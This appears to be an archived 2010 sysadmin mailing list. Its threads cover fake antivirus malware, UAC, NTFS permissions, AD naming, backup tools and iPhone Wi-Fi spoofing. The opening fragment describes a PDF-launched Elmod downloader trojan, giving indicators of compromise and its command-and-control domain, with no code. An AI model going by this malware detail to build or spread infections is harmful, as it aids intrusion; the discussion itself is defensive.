in batscript.vbs) cleans up after itself by removing game.exe, batscript.vbs, 
and script.vbs. 

Game.exe is the Elmod trojan. This is a generic downloader which can be used to 
install any number of second stage trojans. It can be identified by the 
presence of the file C:/Program Files/Microsoft Common/svchost.exe, the 
registry key "software\Microsoft\Windows NT\CurrentVersion\Image File Execution 
Options\explorer.exe", and because it phones home to (currently) jademason.com.

Adobe has said that the Launch functionality is a feature, not a bug. Adobe is 
looking into the issue, but has not said what action, if any, they intended to 
take to mitigate the danger. Their post on the matter does include directions 
for turning off this functionality.

Edward Ziots
CISSP,MCSA,MCP+I,Security +,Network +,CCA
Network Engineer
Lifespan Organization
401-639-3505
ezi...@lifespan.org


-Original Message-
From: Stu Sjouwerman [mailto:s...@sunbelt-software.com] 
Sent: Wednesday, April 28, 2010 4:17 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

Erm, There are 115 known strains (and growing fast) of malwar

Re: Admin rights, UAC, etc. (was: WTF? Fake AV)

[Jon Harris]

" With the exception of exploitation of unpatched vulnerabilities,
I've never seen malware lead to a system compromise on a
properly-secured Win XP machine"

Sorry but how many (l)users know how to this?  How many home owners even
know this is possible.  I would much rather see a Windows Vista with UAC
turned on or Windows 7 in one of their hands than the typical XP box.  You
can teach people not to click Okay or Yes and then call and ask or just go
on with out allowing the security holes.  Yes it is hard to do and no you
sometimes have to make it hurt to get their attention but like James says
charge them more each time they bring in a corrupted system and they pain
will cause them to start using their heads.

On Wed, Apr 28, 2010 at 11:13 AM, Ben Scott  wrote:

> On Wed, Apr 28, 2010 at 10:18 AM,   wrote:
> > Are there any reports out there that show Windows 7 running with UAC that
> > its minimizes the infections of spyware.
>
>  I too would be interested in seeing hard data on this.  I've seen
> lots of marketing claims, and the occasional anecdote, but I remain
> unconvinced that UAC (as typically configured, and for the SOHO user)
> will do anything more than train lusers to click "Allow" when they see
> it.  I've certainly got my own anecdotal evidence that lusers do just
> that.
>
>  To me, the chief advantage to UAC is FRV (filesystem and registry
> virtualization).  It lets software which thinks it needs to write to
> protected locations run anyway.  *That's* a big win.  Lets people who
> understand security cope with software vendors who don't.
>
>  The ability for UAC to use the GUI to prompt for alternate admin
> credentials for privilege elevation is very convenient, but it's not
> compelling to me.  You can achieve similar results using RUNAS.  Not
> as convenient, but gets the job done.
>
> > While I am not a huge fan of MACS ...
>
>  It took me a minute to figure out you meant "Macintoshes" and not
> "Mandatory Access Control System".  "Mac" -- the computer from Apple
> -- is not an acronym.  :)
>
>  (It wouldn't have been so confusing except that MACS and DACS are
> the two common models used for describing access control/permissions.
> Windows mostly uses DACS (hence, DACL, Discretionary Access Control
> List), but the "Integrity Levels" features in Win 6.x are heading in
> the direction of MACS.)
>
> > .. their security model is obviously much better than Windows.
>
>  While Windows is often shipped with a default no-security admin
> account, Windows fully supports creating a user without admin rights.
> It's what we do for *everybody* here at %WORK%.  We've been doing it
> for *years*, and it works very well.
>
>  The only hard part is convincing software vendors that admin rights
> are not required to do things like word processing.
>
>  More generally, one problem is the many PC builders who ship their
> computers configured to run users as admins by default.  Even if UAC
> works as advertised, that's not a good thing.
>
>  But the real hard problem here is home lusers who don't understand
> security.  They consider security a problem, something to be removed.
> And they will install whatever a web page tells them to.  I don't have
> a good solution for that.  I suspect nobody does.
>
> > Even with users not in admin group in Windows XP, Vista I have
> > seen malware get right on and hose a machine.
>
>  With the exception of exploitation of unpatched vulnerabilities,
> I've never seen malware lead to a system compromise on a
> properly-secured Win XP machine.
>
>  I've seen it screw up a user account pretty well, to the point where
> it's easier to erase and reset the user profile than it is to repair
> the registry wreckage.  Most of the time, though, all we have to do is
> login as an admin and delete *.EXE *.DLL *.OCX under their user
> profile folder.
>
>  Are you using a proper set of ACLs on the filesystem?  My strategy
> is that users should only be able to create/modify under their own
> user profile folder.  Nothing else.  Well, the default C:\WINDOWS\TEMP
> permissions are okay.
>
>  In particular, by default, users can create files and folders under
>  and .
> This is a very bad idea on Microsoft's part.  Malware gets in,
> compromises "All Users", admin logs in, Explorer or something else
> trips over something in "All Users", malware now compromises system.
> Way to go Microsoft!
>
> -- Ben
>
> ~ Finally, powerful endpoint security that ISN'T a resource hog! ~
> ~   ~
>

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: WTF? Fake AV

[Mayo, Bill]

Not sure what point you are disputing but 115 (total) versus 70,000 per day 
(your numbers from earlier today) is kind of lopsided.  I'm not saying that 115 
isn't enough to worry about, but if 115 in 8 years is "growing fast", what in 
the world do you call 70,000 per day?!?!

-Original Message-
From: Stu Sjouwerman [mailto:s...@sunbelt-software.com] 
Sent: Wednesday, April 28, 2010 4:17 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

Erm, There are 115 known strains (and growing fast) of malware for the Mac. 
That's why we are releasing a VIPRE client for the Mac in Q2. They have sold 
enough machines to make it attractive for cyber crime to go after. All security 
models will break as per the principle of the 'bigger hammer'. 

Warm regards,


Stu Sjouwerman
Co-Founder, Publisher, Sunbelt Media
P: +1-727-562-0101 ext 218
F: +1-727-562-5199
s...@sunbelt-software.com


  


-Original Message-
From: Steven M. Caesare [mailto:scaes...@caesare.com]
Sent: Wednesday, April 28, 2010 4:10 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

And you are making the (rather dramatic, IMO) over generalization that 
Microsoft simply tells app vendors what to do and expects them to move at the 
drop of a hat.

The reality is that MS has typically bent over backwards to ensure backwards 
compatibility (to a fault you may argue) for applications wherever possible. 
That has been one of the tenets of their OS design since Windows had DOS boxes.

 They have compatibility flags within the OS to special case specific apps and 
installers. They has wow32 and wow64. They did FX!32 on Alpha.
They've supported old versions of API's along with new versions. They allow 
unsigned hardware even though the new model requires signed hardware. Etc, 
etc...

Heck, up until Vista you could still run something from 20 yr old DOS..

Now would they LIKE apps vendors to comply with new direction day1? Yes.
Do they all? No. So there is much notification, suggestion, development 
guidelines, DevCons, etc... to shepherd app vendors the right direction.

Your "MS simply flips a switch and expects devs to comply" sentiment  is an 
inaccurate oversimplification.

-sc

> -Original Message-
> From: Ben Scott [mailto:mailvor...@gmail.com]
> Sent: Wednesday, April 28, 2010 3:57 PM
> To: NT System Admin Issues
> Subject: Re: WTF? Fake AV
> 
> On Wed, Apr 28, 2010 at 12:53 PM, Steven M. Caesare 
>  wrote:
> > A) hardware driver models are a somewhat different beast, and that's 
> > held true for many a platform, and isn't really germane to what we
are
> > discussing here.
> 
>   The only point I was making (and the one you're determined to
ignore, it
> appears): Microsoft routinely throws their weight around to tell the
rest of
> the industry to change to Microsoft's new way of doing things.
Microsoft
> elected not to do that with security.
> 
>   The question was asked (paraphrased): "Why did it take Microsoft so
long to
> do anything about security?"  I answered that question.  No less, no
more.
> You're the one who keeps trying to drag the question off into the
weeds.
> 
>   Of course, an equally valid question would be, "Why did it take
Apple so
> long to do anything about security?"  But that wasn't the question I
was
> addressing.
> 
> > Using AV infection #'s to compare those things and draw the
conclusion
> > he did is no accurate, IMO.
> 
>   That I would agree with.
> 
> -- Ben
> 
> ~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~ 
>   ~

~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~ 
  ~


~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~ 
  ~




~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: Ink & toner "cold callers"

[Jon Harris]

THere is a national list maintained by the feds for what ever use it is.  I
thought the price of a mistake was much higher but hey $200 per call if I
got it would be worth the time to get their number recorded and reported to
the feds.  I wonder who gets the money sure ain't us.

Jon

On Tue, Apr 27, 2010 at 6:21 PM, Ben Scott  wrote:

> On Tue, Apr 27, 2010 at 1:52 PM, Mayo, Bill 
> wrote:
> > At least in the world of nuisance calls, "take me off your list" does no
> > good.  As I understand it, federal law requires telemarketers to maintain
> a
> > "do not call list" and you have to ask to be added to that.
>
>  Mr. Mayo is correct.  The magic words are "do-not-call list".
>
>  Even if they were obligated to take your number off some list, they
> buy/sell lists constantly.  You'd get right back on it.
>
>  But for residences, telemarketers are legally obligated to maintain
> a do-not-call list, put the number on it at your request, and maintain
> your listing for ten years.
>
>  Give them all your phone numbers, and get the name of the person,
> the name of the business, the correspondence address, and make note of
> the date and time.  You can collect penalties to the tune of something
> like $200 per violation.
>
>  The do-not-call regulations do not apply to businesses, but many
> telemarketers don't attempt to make the distinction, because making a
> mistake can be costly.
>
>  More information: http://www.fcc.gov/cgb/donotcall/
>
> -- Ben
>
> ~ Finally, powerful endpoint security that ISN'T a resource hog! ~
> ~   ~
>
>

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: Webster is now employed

[Stu Sjouwerman]

Very Well Done!

Warm regards,


Stu Sjouwerman
Co-Founder, Publisher, Sunbelt Media
P: +1-727-562-0101 ext 218
F: +1-727-562-5199
s...@sunbelt-software.com




From: Webster [mailto:webs...@carlwebster.com]
Sent: Tuesday, April 27, 2010 10:06 PM
To: NT System Admin Issues
Subject: Webster is now employed

Webster is now employed by LPS Integration in Nashville, TN as Sr. Citrix 
Technical Architect.  I start Friday May 7th. http://www.lpsintegration.com/


Carl Webster
Citrix Technology Professional
http://dabcc.com/Webster






...

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: WTF? Fake AV

[Stu Sjouwerman]

Erm, There are 115 known strains (and growing fast) of malware 
for the Mac. That's why we are releasing a VIPRE client for the 
Mac in Q2. They have sold enough machines to make it attractive
for cyber crime to go after. All security models will break as
per the principle of the 'bigger hammer'. 

Warm regards,


Stu Sjouwerman
Co-Founder, Publisher, Sunbelt Media
P: +1-727-562-0101 ext 218
F: +1-727-562-5199
s...@sunbelt-software.com


  


-Original Message-
From: Steven M. Caesare [mailto:scaes...@caesare.com] 
Sent: Wednesday, April 28, 2010 4:10 PM
To: NT System Admin Issues
Subject: RE: WTF? Fake AV

And you are making the (rather dramatic, IMO) over generalization that
Microsoft simply tells app vendors what to do and expects them to move
at the drop of a hat.

The reality is that MS has typically bent over backwards to ensure
backwards compatibility (to a fault you may argue) for applications
wherever possible. That has been one of the tenets of their OS design
since Windows had DOS boxes.

 They have compatibility flags within the OS to special case specific
apps and installers. They has wow32 and wow64. They did FX!32 on Alpha.
They've supported old versions of API's along with new versions. They
allow unsigned hardware even though the new model requires signed
hardware. Etc, etc...

Heck, up until Vista you could still run something from 20 yr old DOS..

Now would they LIKE apps vendors to comply with new direction day1? Yes.
Do they all? No. So there is much notification, suggestion, development
guidelines, DevCons, etc... to shepherd app vendors the right direction.

Your "MS simply flips a switch and expects devs to comply" sentiment  is
an inaccurate oversimplification.

-sc

> -Original Message-
> From: Ben Scott [mailto:mailvor...@gmail.com]
> Sent: Wednesday, April 28, 2010 3:57 PM
> To: NT System Admin Issues
> Subject: Re: WTF? Fake AV
> 
> On Wed, Apr 28, 2010 at 12:53 PM, Steven M. Caesare
>  wrote:
> > A) hardware driver models are a somewhat different beast, and that's
> > held true for many a platform, and isn't really germane to what we
are
> > discussing here.
> 
>   The only point I was making (and the one you're determined to
ignore, it
> appears): Microsoft routinely throws their weight around to tell the
rest of
> the industry to change to Microsoft's new way of doing things.
Microsoft
> elected not to do that with security.
> 
>   The question was asked (paraphrased): "Why did it take Microsoft so
long to
> do anything about security?"  I answered that question.  No less, no
more.
> You're the one who keeps trying to drag the question off into the
weeds.
> 
>   Of course, an equally valid question would be, "Why did it take
Apple so
> long to do anything about security?"  But that wasn't the question I
was
> addressing.
> 
> > Using AV infection #'s to compare those things and draw the
conclusion
> > he did is no accurate, IMO.
> 
>   That I would agree with.
> 
> -- Ben
> 
> ~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~
>   ~

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~


~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: WTF? Fake AV

[Steven M. Caesare]

And you are making the (rather dramatic, IMO) over generalization that
Microsoft simply tells app vendors what to do and expects them to move
at the drop of a hat.

The reality is that MS has typically bent over backwards to ensure
backwards compatibility (to a fault you may argue) for applications
wherever possible. That has been one of the tenets of their OS design
since Windows had DOS boxes.

 They have compatibility flags within the OS to special case specific
apps and installers. They has wow32 and wow64. They did FX!32 on Alpha.
They've supported old versions of API's along with new versions. They
allow unsigned hardware even though the new model requires signed
hardware. Etc, etc...

Heck, up until Vista you could still run something from 20 yr old DOS..

Now would they LIKE apps vendors to comply with new direction day1? Yes.
Do they all? No. So there is much notification, suggestion, development
guidelines, DevCons, etc... to shepherd app vendors the right direction.

Your "MS simply flips a switch and expects devs to comply" sentiment  is
an inaccurate oversimplification.

-sc

> -Original Message-
> From: Ben Scott [mailto:mailvor...@gmail.com]
> Sent: Wednesday, April 28, 2010 3:57 PM
> To: NT System Admin Issues
> Subject: Re: WTF? Fake AV
> 
> On Wed, Apr 28, 2010 at 12:53 PM, Steven M. Caesare
>  wrote:
> > A) hardware driver models are a somewhat different beast, and that's
> > held true for many a platform, and isn't really germane to what we
are
> > discussing here.
> 
>   The only point I was making (and the one you're determined to
ignore, it
> appears): Microsoft routinely throws their weight around to tell the
rest of
> the industry to change to Microsoft's new way of doing things.
Microsoft
> elected not to do that with security.
> 
>   The question was asked (paraphrased): "Why did it take Microsoft so
long to
> do anything about security?"  I answered that question.  No less, no
more.
> You're the one who keeps trying to drag the question off into the
weeds.
> 
>   Of course, an equally valid question would be, "Why did it take
Apple so
> long to do anything about security?"  But that wasn't the question I
was
> addressing.
> 
> > Using AV infection #'s to compare those things and draw the
conclusion
> > he did is no accurate, IMO.
> 
>   That I would agree with.
> 
> -- Ben
> 
> ~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~
>   ~

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: Anyone Used Zmanda backup?

[justino garcia]

Thanks JOE,

Thank You

On Wed, Apr 28, 2010 at 3:33 PM, Joseph L. Casale  wrote:

> >Thanks
> >Does Bacula offer support.
>
> yup, they have an enterprise edition as well...
>
> >Does bacula take file / database backups, or Image based.
>
> It can be designed to do anything, for example I use a "RunBefore Script"
> to do some
> osql and ntbackup commands that create the files I will immediately backup
> after. It
> also can use VSS.
>
> >Does it require a Linux box.
>
> But of course:) There are windows clients however.
>
> >can it do off-site, how about rotation/Retention  rules (how long, and how
> to remove older backups).
>
> It does whatever you define in the configs, and yes it can be set to do
> offsite.
>
> >Alerts if it needs to be checked?
>
> Yup, and the granularity is configurable...
>
> ~ Finally, powerful endpoint security that ISN'T a resource hog! ~
> ~   ~
>
>


-- 
Justin
IT-TECH

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: The finer points of NTFS ACLs (was: Software installs on new PCs)

[Ben Scott]

On Wed, Apr 28, 2010 at 1:30 PM, Crawford, Scott  wrote:
> MoveSecurityAttributes
> http://support.microsoft.com/kb/310316

  Ah, that looked very promising for a moment.  But then I saw what
Bill Mayo saw: It apparently requires permission to modify the ACL,
and we don't allow that.

  It's also apparently an attempt to work around an NTFS bug in
Windows Explorer, so it won't work for anything that doesn't use
Explorer to move files.  Granted, for our users, that would do the
trick, but I still have to wonder why they don't just fix NTFS...
/grumble

-- Ben

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: Current AD domain naming best practices

[David Lum]

For what I do, I see no differences between the three. I do not deal with certs 
however which I imagine would be where I would see it the most. Only the 
subdomain location might ever need to use ADFS.

Dave

-Original Message-
From: Joseph Heaton [mailto:jhea...@dfg.ca.gov] 
Sent: Wednesday, April 28, 2010 7:59 AM
To: NT System Admin Issues
Subject: RE: Current AD domain naming best practices

David,

Could you profile the differences in managing each of these?  Is one "easier" 
than the others?

>>> David Lum  4/28/2010 7:49 AM >>>
%dayjob% does sub-domain as well, one of my clients I have .local (they are 
ci.cornelius.or.us on the outside anyhow), and another client is same 
inside/outside (I inherited this setup).

Dave

-Original Message-
From: Jacob [mailto:ja...@excaliburfilms.com] 
Sent: Wednesday, April 28, 2010 7:42 AM
To: NT System Admin Issues
Subject: RE: Current AD domain naming best practices

What we use... sub-domain. Have had no issues for years.

-Original Message-
From: Michael B. Smith [mailto:mich...@smithcons.com] 
Sent: Wednesday, April 28, 2010 7:31 AM
To: NT System Admin Issues
Subject: RE: Current AD domain naming best practices

This will _KILL_ you if you ever need to deploy ADFS.

Best practice is to use a sub-domain (i.e., ad.example.com) of your external
domain.

Regards,

Michael B. Smith
Consultant and Exchange MVP
http://TheEssentialExchange.com 


-Original Message-
From: John Aldrich [mailto:jaldr...@blueridgecarpet.com] 
Sent: Wednesday, April 28, 2010 10:30 AM
To: NT System Admin Issues
Subject: RE: Current AD domain naming best practices

My understanding is the same as your Novell admin's: keep the two separate,
i.e. businessname.com for external and businessname.local for internal.




-Original Message-
From: Joseph Heaton [mailto:jhea...@dfg.ca.gov] 
Sent: Wednesday, April 28, 2010 10:22 AM
To: NT System Admin Issues
Subject: Current AD domain naming best practices

We are currently in the beginning phases of migrating from Novell
e-Directory, to AD.  We are having discussions to decide on a new internal
domain name.  I know that years ago, it was best practice to have a
different internal domain name from your external domain name, which is what
the Novell guy is holding onto, like a pitbull to a mailman's leg.  Is that
still true today?  We are on private IPs internally, so external forces
can't route to the inside anyway, so my thinking, and the other Windows
admins, is that having the same FQDN internally would be ok.

TIA,

Joe


~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~
  ~



~ Finally, powerful endpoint security that ISN'T a resource hog! ~ ~
  ~

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~


~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~



~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~



~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~




~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: The finer points of NTFS ACLs (was: Software installs on new PCs)

[Ben Scott]

On Wed, Apr 28, 2010 at 12:55 PM, James Rankin  wrote:
> I don't know whether removing Creator Owner from the ACL actually updates or
> changes the owner in any way.

  It doesn't change the owner, but that doesn't matter.  "CREATOR
OWNER" is a magic ACE that turns into whatever the owner is/was set to
when the ACL is applied.  Simply remove the "CREATOR OWNER" ACE and
avoid the problem entirely.

  Why are you using "CREATOR OWNER" in an ACL in the first place?  I
think that's your problem.

> For preserving (or not) permissions on file moves, I find robocopy is the
> way forward ...

  Two problems with that: (1) Requires permission to set the ACL.  (2)
Asking your typical user to use ROBOCOPY to move files is ridiculous.

-- Ben

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: Anyone see a problem?

[David Lum]

Huh, I learned something new. Thanks everyone.

Dave

From: John Aldrich [mailto:jaldr...@blueridgecarpet.com]
Sent: Wednesday, April 28, 2010 12:46 PM
To: NT System Admin Issues
Subject: RE: Anyone see a problem?

Yep. I have several access point / routers set up with the same security 
settings and ID and my laptop will automatically connect to them.

[cid:image001.jpg@01CAE6D2.FC2FEB80][cid:image002@01cae6d2.fc2feb80]

From: Steve Ens [mailto:stevey...@gmail.com]
Sent: Wednesday, April 28, 2010 3:28 PM
To: NT System Admin Issues
Subject: Re: Anyone see a problem?

In my experience, if you have two WAPs setup with the same name and the same 
security settings, the device will connect automatically.
On Wed, Apr 28, 2010 at 2:25 PM, Mayo, Bill 
mailto:bem...@pittcountync.gov>> wrote:
Is this unique?  In other words, if you connect to a wi-fi network named 
"linksys" (rare, I know) with pretty much any device and then come within range 
of a different network named "linksys" will it automatically connect?  I am 
asking because I honestly don't know.  For me, it's a bigger question of being 
aware of how your device is configured and from where you are getting your 
internet access.


From: David Lum [mailto:david@nwea.org]
Sent: Wednesday, April 28, 2010 3:21 PM
To: NT System Admin Issues
Subject: Anyone see a problem?
"Typically, an iPhone will look for a specific MAC address--the unique 
identifier for the router--to verify that the wireless network is a device a 
user agreed to join previously. However, if the iPhone has previously connected 
to any one of the numerous free AT&T Wi-Fi hot spots (offered at virtually 
every Starbucks in the U.S., for example) the device will ignore what the MAC 
address says and simply connect to the network if it has "AT&T Wifi" attached, 
Kamkar said".

http://news.cnet.com/8301-27080_3-20003455-245.html?tag=mncol;title
David Lum // SYSTEMS ENGINEER
NORTHWEST EVALUATION ASSOCIATION
(Desk) 971.222.1025 // (Cell) 503.267.9764



















~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~<><>

Re: WTF? Fake AV

[Ben Scott]

On Wed, Apr 28, 2010 at 12:53 PM, Steven M. Caesare
 wrote:
> A) hardware driver models are a somewhat different beast, and that's
> held true for many a platform, and isn't really germane to what we are
> discussing here.

  The only point I was making (and the one you're determined to
ignore, it appears): Microsoft routinely throws their weight around to
tell the rest of the industry to change to Microsoft's new way of
doing things.  Microsoft elected not to do that with security.

  The question was asked (paraphrased): "Why did it take Microsoft so
long to do anything about security?"  I answered that question.  No
less, no more.  You're the one who keeps trying to drag the question
off into the weeds.

  Of course, an equally valid question would be, "Why did it take
Apple so long to do anything about security?"  But that wasn't the
question I was addressing.

> Using AV infection #'s to compare those things and draw the conclusion
> he did is no accurate, IMO.

  That I would agree with.

-- Ben

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: Current AD domain naming best practices

[Joseph Heaton]

I'm simply gathering information on the 3 options, and what everyone 
recommends.  Unfortunately, there is no clear-cut "winner".  I've found that 
all 3 are valid options, depending on how much administrative overhead you want 
to add to the process.  However, Michael Smith brought up a rather strong 
concern over why different names would be bad, if you're possibly going to 
implement ADFS.

Anyway, I very much appreciate your, and everyone's, input.

Joe

>>> "Andrew S. Baker"  4/28/2010 12:33 PM >>>
A subdomain is fine, but suffers many of the same drawbacks as using a
single DNS namespace.

And you're involving more DNS servers into the resolution process for what
purpose again?

-ASB: http://XeeSM.com/AndrewBaker 

Sent from my Motorola Droid

On Apr 28, 2010 12:51 PM, "Joseph Heaton"  wrote:

Andrew,

So you don't recommend the subdomain?  Also, if you could expand on your
answer, it'd be great, as I'm bringing all ideas to a meeting this
afternoon, with pros/cons behind each option.

>>> "Andrew S. Baker"  4/28/2010 8:55 AM >>>

Use two separate domain names, even if you register the internal one.

You can avoid all manner of p...
the Novell guy is saying.  Is that

still true today? We are on private IPs internally, so external forces
can't route to the inside an...

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~


~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: Outlook 2K3 as non admin (was RE: WTF? Fake AV)

[Ben Scott]

On Wed, Apr 28, 2010 at 1:19 PM, David Lum  wrote:
> ... I have Outlook 2003 working for non-admins and have for some years now.

  Same here.  We've been running Outlook 2003 without admin rights
since it was released.  Come to think of it, I'm not sure I've *ever*
run Outlook 2003 as an admin, even for installation.

-- Ben

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: Anyone see a problem?

[Maglinger, Paul]

Or $1.50 for a bottle of water?!?

 

From: Don Guyer [mailto:don.gu...@prufoxroach.com] 
Sent: Wednesday, April 28, 2010 2:23 PM
To: NT System Admin Issues
Subject: RE: Anyone see a problem?

 

Yes I do! Who, in their right mind, pays $5 for a cup of coffee?!

 

J

 

Don Guyer

Systems Engineer - Information Services

Prudential, Fox & Roach/Trident Group

431 W. Lancaster Avenue

Devon, PA 19333

Direct: (610) 993-3299

Fax: (610) 650-5306

don.gu...@prufoxroach.com

 

From: David Lum [mailto:david@nwea.org] 
Sent: Wednesday, April 28, 2010 3:21 PM
To: NT System Admin Issues
Subject: Anyone see a problem?

 

"Typically, an iPhone will look for a specific MAC address--the unique
identifier for the router--to verify that the wireless network is a
device a user agreed to join previously. However, if the iPhone has
previously connected to any one of the numerous free AT&T Wi-Fi hot
spots (offered at virtually every Starbucks in the U.S., for example)
the device will ignore what the MAC address says and simply connect to
the network if it has "AT&T Wifi" attached, Kamkar said".

 

http://news.cnet.com/8301-27080_3-20003455-245.html?tag=mncol;title

David Lum // SYSTEMS ENGINEER 
NORTHWEST EVALUATION ASSOCIATION
(Desk) 971.222.1025 // (Cell) 503.267.9764

 

 

 

 

 

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: Anyone see a problem?

[Steven M. Caesare]

You misspelled "opportunity".

 

-sc

 

From: David Lum [mailto:david@nwea.org] 
Sent: Wednesday, April 28, 2010 3:21 PM
To: NT System Admin Issues
Subject: Anyone see a problem?

 

"Typically, an iPhone will look for a specific MAC address--the unique
identifier for the router--to verify that the wireless network is a
device a user agreed to join previously. However, if the iPhone has
previously connected to any one of the numerous free AT&T Wi-Fi hot
spots (offered at virtually every Starbucks in the U.S., for example)
the device will ignore what the MAC address says and simply connect to
the network if it has "AT&T Wifi" attached, Kamkar said".

 

http://news.cnet.com/8301-27080_3-20003455-245.html?tag=mncol;title

David Lum // SYSTEMS ENGINEER 
NORTHWEST EVALUATION ASSOCIATION
(Desk) 971.222.1025 // (Cell) 503.267.9764

 

 

 

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: Dell MD1000

[Anders Blomgren]

The MD1000 is just a SAS enclosure without any controller at all. Are you
asking about the MD3000 or the Perc6 raid card that actually drives an
MD1000?

-Anders

On Wed, Apr 28, 2010 at 9:33 PM, Richard Stovall  wrote:

> Anyone have one (or more) of the Dell MD1000s?  Any comments, good or ill?
>
> I'm thinking about creating a new file server and this is a relatively
> inexpensive option from a big vendor.
>
> Thanks,
> RS
>
>
>
>
>
>

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: Anyone see a problem?

[John Aldrich]

Yep. I have several access point / routers set up with the same security
settings and ID and my laptop will automatically connect to them.

 

John-AldrichTile-Tools

 

From: Steve Ens [mailto:stevey...@gmail.com] 
Sent: Wednesday, April 28, 2010 3:28 PM
To: NT System Admin Issues
Subject: Re: Anyone see a problem?

 

In my experience, if you have two WAPs setup with the same name and the same
security settings, the device will connect automatically.  

On Wed, Apr 28, 2010 at 2:25 PM, Mayo, Bill  wrote:

Is this unique?  In other words, if you connect to a wi-fi network named
"linksys" (rare, I know) with pretty much any device and then come within
range of a different network named "linksys" will it automatically connect?
I am asking because I honestly don't know.  For me, it's a bigger question
of being aware of how your device is configured and from where you are
getting your internet access.

 

  _  

From: David Lum [mailto:david@nwea.org] 
Sent: Wednesday, April 28, 2010 3:21 PM
To: NT System Admin Issues
Subject: Anyone see a problem?

"Typically, an iPhone will look for a specific MAC address--the unique
identifier for the router--to verify that the wireless network is a device a
user agreed to join previously. However, if the iPhone has previously
connected to any one of the numerous free AT&T Wi-Fi hot spots (offered at
virtually every Starbucks in the U.S., for example) the device will ignore
what the MAC address says and simply connect to the network if it has "AT&T
Wifi" attached, Kamkar said".

 

http://news.cnet.com/8301-27080_3-20003455-245.html?tag=mncol;title

David Lum // SYSTEMS ENGINEER 
NORTHWEST EVALUATION ASSOCIATION
(Desk) 971.222.1025 // (Cell) 503.267.9764

 

 

 

 

 

 

 

 

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~<><>

Dell MD1000

[Richard Stovall]

Anyone have one (or more) of the Dell MD1000s?  Any comments, good or ill?

I'm thinking about creating a new file server and this is a relatively
inexpensive option from a big vendor.

Thanks,
RS

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

RE: Anyone Used Zmanda backup?

[Joseph L. Casale]

>Thanks
>Does Bacula offer support.

yup, they have an enterprise edition as well...

>Does bacula take file / database backups, or Image based.

It can be designed to do anything, for example I use a "RunBefore Script" to do 
some
osql and ntbackup commands that create the files I will immediately backup 
after. It
also can use VSS.

>Does it require a Linux box.

But of course:) There are windows clients however.

>can it do off-site, how about rotation/Retention  rules (how long, and how to 
>remove older backups).

It does whatever you define in the configs, and yes it can be set to do offsite.

>Alerts if it needs to be checked?

Yup, and the granularity is configurable...

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: Current AD domain naming best practices

[Andrew S. Baker]

A subdomain is fine, but suffers many of the same drawbacks as using a
single DNS namespace.

And you're involving more DNS servers into the resolution process for what
purpose again?

-ASB: http://XeeSM.com/AndrewBaker

Sent from my Motorola Droid

On Apr 28, 2010 12:51 PM, "Joseph Heaton"  wrote:

Andrew,

So you don't recommend the subdomain?  Also, if you could expand on your
answer, it'd be great, as I'm bringing all ideas to a meeting this
afternoon, with pros/cons behind each option.

>>> "Andrew S. Baker"  4/28/2010 8:55 AM >>>

Use two separate domain names, even if you register the internal one.

You can avoid all manner of p...
the Novell guy is saying.  Is that

still true today? We are on private IPs internally, so external forces
can't route to the inside an...

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: Anyone Used Zmanda backup?

[justino garcia]

Thanks
Does Bacula offer support.
Does bacula take file / database backups, or Image based.
Does it require a Linux box.
can it do off-site, how about rotation/Retention  rules (how long, and how
to remove older backups).
Alerts if it needs to be checked?
On Wed, Apr 28, 2010 at 2:22 PM, Joseph L. Casale  wrote:

>  I used to use the Enterprise version, it lacked some trivial features
> like an automated verify and the html based console was not all that
> friendly.
>
> I use Bacula in a mixed environment now…
>
> I like it much better.
>
>
>
> *From:* justino garcia [mailto:jgarciaitl...@gmail.com]
> *Sent:* Wednesday, April 28, 2010 11:59 AM
>
> *To:* NT System Admin Issues
> *Subject:* Anyone Used Zmanda backup?
>
>
>
> Anyone using Zmanda in production, how good is it?
>
> Have you tested a recovery, how does it handle retention policies? And
> would you recommended for off-site backups:?
>
> thanks
>
> --
> Justin
> IT-TECH
>
>
>
>
>
>
>
>
>
>


-- 
Justin
IT-TECH

~ Finally, powerful endpoint security that ISN'T a resource hog! ~
~   ~

Re: Anyone see a problem?

[Steve Ens]

In my experience, if you have two WAPs setup with the same name and the same
security settings, the device will connect automatically.

On Wed, Apr 28, 2010 at 2:25 PM, Mayo, Bill  wrote:

>  Is this unique?  In other words, if you connect to a wi-fi network named
> "linksys" (rare, I know) with pretty much any device and then come within
> range of a different network named "linksys" will it automatically connect?
